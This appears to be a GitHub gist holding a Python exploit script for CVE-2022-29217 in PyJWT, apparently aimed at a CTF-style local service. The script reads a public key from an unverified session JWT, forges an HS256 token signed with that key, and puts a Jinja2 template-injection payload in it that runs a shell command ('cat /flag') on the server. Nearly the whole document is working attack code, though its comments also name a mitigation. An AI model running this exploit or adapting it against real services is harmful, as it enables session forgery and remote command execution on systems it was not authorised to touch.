@s3rgeym
Forked from seifallahhomrani1/exploit.py
Last active August 24, 2022 01:48
CVE-2022-29217 !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! PYJWT RCE
import requests
import jwt
import base64
import json
def extract_pub_key(session_cookie):
    """Return the raw key bytes carried in the ``pub`` claim of the session JWT.

    ``session_cookie`` is a response whose cookie jar holds a ``session``
    cookie containing a JWT (``header.payload.signature``).  Only the payload
    segment is looked at: it is base64-decoded *without* any signature check,
    parsed as JSON, and its ``pub`` entry (itself base64 text) is decoded and
    returned as bytes.  Raises ``KeyError`` if the cookie or claim is absent.
    """
    token = session_cookie.cookies.get_dict()['session']
    payload_segment = token.split('.')[1]
    # JWT segments are emitted without '=' padding; the standard decoder
    # ignores surplus padding, so a fixed '==' suffix is enough here.
    claims = json.loads(base64.b64decode(payload_segment + '=='))
    return base64.b64decode(claims['pub'])
# Base URL (scheme + host, despite the name) and port of the target service;
# both are hard-coded and meant to be edited before running.
ip = "http://127.0.0.1" #change it
port = "5000" #change it
# One session so the cookie jar persists across the requests below.
s = requests.Session()
# First request to '/': its response is not used directly; presumably it
# initialises the server-side session (TODO confirm against the target app).
s.get(f'{ip}:{port}/')
# The '/e' response's cookie jar carries the 'session' JWT whose unverified
# payload exposes a 'pub' claim (see extract_pub_key).
session_cookie = s.get(f'{ip}:{port}/e')
pub_key_bytes = extract_pub_key(session_cookie)
# Template-injection string placed in the 'Name' claim; the page labels the
# outcome RCE, and the command reads /flag, i.e. a CTF-style target.
SSTI_Payload = "{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('cat /flag').read() }}"
# Algorithm-confusion step (the page attributes it to CVE-2022-29217): the
# token is signed with HS256 using the *public* key bytes as the HMAC secret.
# A verifier that accepts an HMAC algorithm alongside the asymmetric one, and
# passes the same public key as the verification key, will treat this forged
# token as valid.  Defender mitigation: pin jwt.decode(..., algorithms=[...])
# to the single expected asymmetric algorithm and run a patched PyJWT release
# that rejects public-key material as an HMAC secret.
# NOTE(review): str() is a no-op when jwt.encode() returns str; if it returned
# bytes the cookie value would become a "b'...'" literal — confirm the
# installed PyJWT's return type.
bad_session_cookie = str(jwt.encode({"Name": SSTI_Payload} , pub_key_bytes, algorithm="HS256"))
# Replace the server-issued cookie with the forged one and request '/e'
# again; the response body is printed as-is.
s.cookies.set("session",bad_session_cookie)
flag = s.get(f'{ip}:{port}/e')
print(flag.text)